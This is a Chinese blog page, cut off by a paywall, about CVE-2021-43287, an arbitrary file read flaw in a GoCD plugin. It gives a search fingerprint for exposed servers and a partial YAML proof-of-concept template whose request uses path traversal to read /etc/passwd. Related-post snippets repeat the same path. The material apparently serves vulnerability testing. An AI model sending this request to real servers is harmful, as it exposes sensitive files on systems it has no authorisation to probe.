GoCD plugin 任意文件读取漏洞--CVE-2021-43287

已于 2022-11-30 10:40:45 修改
阅读量351 收藏
点赞数 1
文章标签: 安全 web安全 网络安全 安全威胁分析 安全架构
于 2022-11-29 16:22:10 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/U_U520/article/details/128100399
版权

网络测绘

title="Create a pipeline - Go"

POC

id: GoCD plugin  

info:   
  name: GoCD plugin 任意文件读取漏洞 CVE-2021-43287  
  author: 不动明王   
  severity: high    
  description: |    
   GoCD plugin aip 参数中的 pluginName 参数存在任意文件读取漏洞,导致攻击者可以获取服务器中的任意敏感信息

  reference:
  - http://wiki.peiqi.tech/wiki/webserver/GoCD/GoCD%20plugin%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E%20CVE-2021-43287.html  #  - 插入列表


rules:  
  mingzi1:   
    request:  
      method: GET 
      path: /go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../../../../../etc/passwd  
    expression: response.status == 200 && response.b
最低0.47元/天 解锁文章
不动明王_你懂不懂
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
复现CVE-2021-43287GoCD plugin 任意文件读取漏洞
记录并分享学习安全的知识点..
09-27 306
GoCD plugin aip 参数中的 pluginName 参数存在任意文件读取漏洞,导致攻击者可以获取服务器中的任意敏感信息。
solly0880#wiki#若依管理系统 后台任意文件读取 CNVD-2021-019311
07-25
若依(RuoYi)管理系统 后台任意文件读取漏洞描述若依管理系统是基于SpringBoot的权限管理系统,登录后台后可以读取服务器上的任意文件漏洞影响app="
CVE-2021-43287 GoCD任意文件读取 漏洞复现
m0_58596609的博客
12-29 2237
CVE-2021-43287 GoCD任意文件读取 漏洞复现
GoCD plugin 任意文件读取漏洞 CVE-2021-43287
weixin_46801402的博客
11-03 339
GoCD plugin 任意文件读取漏洞 CVE-2021-43287
gocd-vault-secret-plugin:HashiCorp的Vault的GoCD秘密插件
03-19
Vault Secret Manager插件这是一个GoCD Secrets插件,允许用户将用作GoCD服务器的秘密管理器。该插件支持KV Secrets Engine的版本2。目录使用Docker设置保管库运行以下命令以启动Vault的Docker容器docker run --cap-...
docker-gocd-server:GoCD的Docker服务器映像
05-05
如果您想提供诸如SSH私钥之类的安全凭证,则可以挂载/home/go docker run -v /path/to/godata:/godata -v /path/to/home-dir:/home/go gocd/gocd-server:v21.2.0 注意:确保容器中的go用户可以访问/path/to/home-...
docker-elastic-agents-plugin:用于GoCD的基于Docker的弹性代理
05-08
适用于Docker的GoCD Elastic Agent插件 目录 安装 可找到安装文档。 建立代码库 要构建罐子,请运行./gradlew clean test assemble 将您自己的Docker映像与弹性代理一起使用 该插件执行以下泊坞窗命令的等​​效项以...
docker-swarm-elastic-agent-plugin:用于GoCD的基于Docker群的弹性代理
03-04
适用于Docker Swarm的GoCD Elastic Agent插件 目录 安装 可找到安装文档。 建立代码库 要构建罐子,请运行./gradlew clean test assemble 将自己的Docker映像与弹性代理一起使用 提供更多有关构建自定义GoCD代理...
solly0880#wiki#帆软 V9 任意文件覆盖文件上传1
07-25
帆软 V9 任意文件覆盖文件上传漏洞描述帆软 V9 存在任意文件覆盖,导致攻击者可以任意文件上传漏洞影响帆软 V9漏洞复现。
gocd-plugins:与Go.CD一起使用的OSS插件集合
05-23
gocd插件 :warning: 该项目不再维护 与Go.CD一起使用的插件集合。 请访问 ,以获取有关Go.CD本身的更多信息。 SonarQube质量门插件 从go.cd管道验证SonarQube质量门。 检查是否通过了SonarQube中的特定质量门,或者它是否处于错误或警告状态。 如果没有通过质量门,此插件可以阻止进一步执行管道。 Nessus扫描插件 从go.CD执行nessus安全扫描。 根据扫描结果配置管道行为。 更多内容 Check_MK监控插件 通过go.cd管道管理Check_MK监视服务器上的主机。 使用管道将主机直接添加或删除到Check_MK。 更多 Docker管道插件 根据您的材料构建一个docker映像,使用您设置的标签对其进行标记,将其推送至您指定的注册表,然后清理所有内容。 有关更多信息
go-artifactory-pluginGoCD的Artifactory插件
02-05
ThoughtWorks 插件 该项目是该插件的版本的简化分支,因为他不再更新其版本,并且与GoCD最新版本(> = 17.2)不兼容。 作为原来的插件没有它不生成属性上传文物。 产品特点 将工件上传到Artifactory(包括对照Artifactory生成的校验和进行校验) 上传构建详细信息 该插件需要为GoCD任务设置这些环境变量 ARTIFACTORY_URL ARTIFACTORY_USER ARTIFACTORY_PASSWORD 安装 下载[plugin jar](修复此文件),然后复制到GoCD服务器上的plugins / external目录中,然后重新启动。 有关
gocd-slack-build-notifier:GoCDgocd.org)插件可将构建通知推送到Slack
05-13
gocd-slack-build-notifier 基于Slack的GoCD构建通知器设置从下载jar并将其放在/ plugins / external中,然后重新启动Go Server。配置所有配置均为格式。 插件按以下顺序搜索配置文件由环境变量GO_NOTIFY_CONF定义的...
[文件读取]GoCD 任意文件读取漏洞 (CVE-2021-43287)
最新发布
wj33333的博客
11-14 244
其前身为CruiseControl,是ThoughtWorks在做咨询和交付交付项目时自己开发的一款开源的持续集成工具。后来随着持续集成及持续部署的火热,ThoughtWorks专门成立了一个项目组,基于Cruise开发除了Go这款工具。GoCD的v20.6.0 - v21.2.0版本存在任意文件读取漏洞,可以通过/go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../etc/passwd 对文件进行读取
PTB-CVE
zip471642048的博客
05-05 996
文章目录Apache HTTPD 多后缀解析漏洞 Apache HTTPD 多后缀解析漏洞 如果运维人员给.php后缀增加了处理器: AddHandler application/x-httpd-php .php 那么,在有多个后缀的情况下,只要一个文件含有.php后缀的文件即将被识别成PHP文件,没必要是最后一个后缀。利用这个特性,将会造成一个可以绕过上传白名单的解析漏洞。 上传一个以jpg为后缀的一句话木马但是包含.php 会被成功解析成php ...
MKdocs 任意文件读取漏洞 CVE-2021-40978
weixin_46801402的博客
11-16 336
MKdocs 任意文件读取漏洞 CVE-2021-40978
速度更新!GoCD又曝仨洞,极易遭利用且结合利用可成供应链攻击的新跳板
smellycat000的专栏
11-12 263
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士专栏·供应链安全数字化时代,软件无处不在。软件如同社会中的“虚拟人”,已经成为支撑社会正常运转的最基本元素之一,软件的安全性问题也正在成...
域控漏洞-CVE-2021-42287&42278复现
热门推荐
君行路的博客
12-16 1万+
文章目录环境介绍sam-the-admin python利用脚本noPac利用脚本利用流程1. 查询MAQ值2. 普通域用户创建机器账户并清除SPN3. 重设机器名称4. 为机器账户请求TGT5. 再次更改机器账户的sAMAccountName6. 通过S4U2self协议向DC请求TGS票据参考链接 微信公众号:信安文摘 环境介绍 域:god.org windows 7 192.168.52.143 机器名称:stu1 域内普通用户:liukaifeng01:hongrisec@2021@ wind
go自动化部署工具有哪些
06-03
3. GoCDGoCD是一款使用Go语言开发的持续交付工具,支持自动化构建、测试和部署等功能,适用于多种应用程序。 4. Kubernetes:Kubernetes是一款使用Go语言开发的容器编排工具,支持自动化部署、伸缩、容错等功能,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

不动明王_你懂不懂

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值